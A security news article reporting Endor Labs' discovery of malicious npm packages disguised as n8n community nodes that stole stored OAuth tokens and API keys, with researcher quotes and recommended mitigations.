Threat actors were spotted weaponizing the n8n automation ecosystem this week, slipping malicious npm packages into its marketplace of community-maintained nodes.
The deceptive packages, disguised as legitimate integrations like Google Ads connectors, lured developers into connecting OAuth and API keys, enabling attackers to extract sensitive tokens and credentials through a seemingly routine workflow execution.
According to Endor Labs, which discovered the campaign, the attack represents a new escalation in supply chain threats. “To our knowledge, the n8n workflow automation platform has not been targeted before by supply chain attacks,” said Henrik Plate, lead researcher at Endor Labs. “It shows that attackers keep on targeting new ecosystems to spread malicious packages, maybe due to tightening controls in other ecosystems like npm.”
Endor Labs warned in a blog post that enterprises used to monitoring build systems for supply-chain abuse may miss this class of attack entirely, as it targets automation platforms that already sit deep inside business workflows. The activity follows a max-severity n8n vulnerability disclosure (CVE-2026-21858), though researchers have not established any connection between the incidents.
How the attack unpacks
The attack begins with the publication of a malicious npm package to the public registry. These packages pose as community nodes, the extensions that n8n users can install to expand automation capabilities. Once installed, the malicious node behaves like any other integration, presenting configuration screens and collecting credentials required for typical workflow tasks.
Behind the scenes, however, it executes code that decrypts stored OAuth tokens and API keys from n8n’s credential store and exfiltrates them to remote command-and-control (C2) servers controlled by the attackers.
The approach succeeds because n8n treats all installed nodes as trusted code. There’s no pre-publication review on npm, and installed nodes run with full access to the workflow environment. This means the nodes can read decrypted credentials, make arbitrary network requests, and interact with the host system just as legitimate nodes do.
“According to security researchers at data security company Cyera, there were more than 100,000 n8n servers vulnerable to CVE-2026-21858,” Endor researchers said in the post. “We do not know how many of those install npm packages as community nodes in their environments. Still, this number shows that the n8n ecosystem is active and thriving.”
Tips for reducing risks
Workflow automation platforms like n8n are widely adopted for their capability to let teams link disparate systems without hand-coding every integration. But the community node ecosystem depends on npm packages and, therefore, inherits associated risks.
To mitigate exposure, Endor Labs researchers recommended measures such as preferring built-in integrations over community nodes, auditing package metadata and source code before installation, monitoring outbound network activity from automation hosts, and using isolated service accounts with limited privileges wherever possible. Endor Labs published a list of indicators of compromise (IOCs), including package names, C2 infrastructure, and malicious files, to support detection efforts. “Even though the malicious packages we know have been disabled in the last few hours, the attacks may continue and evolve going forward,” Plate noted.
No Responses